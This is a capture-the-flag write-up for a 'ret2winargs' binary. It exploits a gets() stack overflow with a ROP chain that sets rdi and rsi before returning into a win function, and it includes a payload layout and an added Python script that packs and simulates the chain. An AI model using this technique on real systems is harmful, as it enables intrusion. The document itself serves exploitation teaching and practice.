
ret2winargs

Solved by: grb

This is what the challenge looks like; as usual, there's a single binary file attached to it.

Challenge

Let's open the binary in IDA!

main function

vuln function

win function

So, there are two functions worth looking at: the vuln function and the win function. In the vuln function there's a stack buffer that is filled with gets, which gives us a buffer overflow and therefore a ret2win attack. But from the name of the challenge and the disassembly of the win function, we know that we need to supply two arguments to win to get the flag. Next, let's use checksec to check the security mitigations on the binary.

checksec output

Oh look! No canary and no PIE, perfect! First, we need to look for ROP gadgets: since we need to pass two parameters (rdi and rsi in the x86-64 SysV calling convention), we need both a pop rdi; ret gadget and a pop rsi; ret gadget (a pop rsi; pop r15; ret variant works just as well, with a dummy value for r15). We can use ROPgadget to find them.

gadgets

NICE!

Finally, let's craft our exploit using pwntools! You can check it here, but our payload will look like this:

[72 BYTES STACK SMASH]
[POP RDI; RET; GADGET ADDR]
[0xDEADBEEF (PARAM 1)]
[POP RSI; POP R15; RET; GADGET ADDR]
[0xCAFEBABE (PARAM 2)]
[0x0 (UNUSED, WILL BE POPPED TO R15)]
[WIN FUNCTION ADDR]
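As an added example (not the writeup's own exploit script), here is how that layout packs into bytes and how the chain actually executes once vuln returns: each ret pops the next qword into rip, and each pop gadget consumes the qwords that follow it. The gadget and win addresses are placeholders, since the page does not list them; only the 72-byte padding and the two argument values come from the writeup.

```python
import struct

# Assumed (placeholder) addresses: the binary has no PIE, so these would be
# fixed, but their real values are not given on the page.
POP_RDI_RET = 0x401200        # pop rdi; ret
POP_RSI_R15_RET = 0x401210    # pop rsi; pop r15; ret
WIN = 0x401156                # win(rdi, rsi)
PADDING = 72                  # bytes from buffer start to saved RIP (from the writeup)

# Which registers each gadget pops, in order.
GADGETS = {
    POP_RDI_RET: ["rdi"],
    POP_RSI_R15_RET: ["rsi", "r15"],
}

def p64(v):
    """Little-endian 8-byte packing, like pwntools' p64."""
    return struct.pack("<Q", v)

def build_payload(arg1=0xDEADBEEF, arg2=0xCAFEBABE):
    """Stack layout from the writeup: padding, then the ROP chain."""
    chain = [
        POP_RDI_RET, arg1,          # rdi = arg1
        POP_RSI_R15_RET, arg2, 0,   # rsi = arg2, r15 = dummy (unused)
        WIN,                        # finally return into win()
    ]
    return b"A" * PADDING + b"".join(p64(x) for x in chain)

def simulate(payload):
    """Walk the chain the way the CPU does after vuln's 'ret'.
    Returns (rdi, rsi) at the moment control reaches win()."""
    stack = payload[PADDING:]
    qwords = [struct.unpack("<Q", stack[i:i + 8])[0] for i in range(0, len(stack), 8)]
    regs = {"rdi": 0, "rsi": 0, "r15": 0}
    rsp = 0
    while rsp < len(qwords):
        rip = qwords[rsp]; rsp += 1          # 'ret' pops the return address
        if rip == WIN:
            return regs["rdi"], regs["rsi"]
        if rip not in GADGETS:               # returning into non-code: the process would crash
            raise ValueError(f"crash: unknown return address {rip:#x}")
        for reg in GADGETS[rip]:             # the gadget's pops consume the next qwords
            regs[reg] = qwords[rsp]; rsp += 1
    raise ValueError("chain ran off the end of the stack without reaching win")

if __name__ == "__main__":
    print("win(%#x, %#x)" % simulate(build_payload()))
```

Swapping the pop rsi; pop r15; ret gadget for a plain pop rsi; ret and dropping the dummy qword gives the same (rdi, rsi); forgetting the dummy while keeping the two-pop gadget would instead feed the win address into r15 and run off the chain.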

And finally, running our exploit gives us...

PWNED!

PO- PO- PO- PWNED!!!
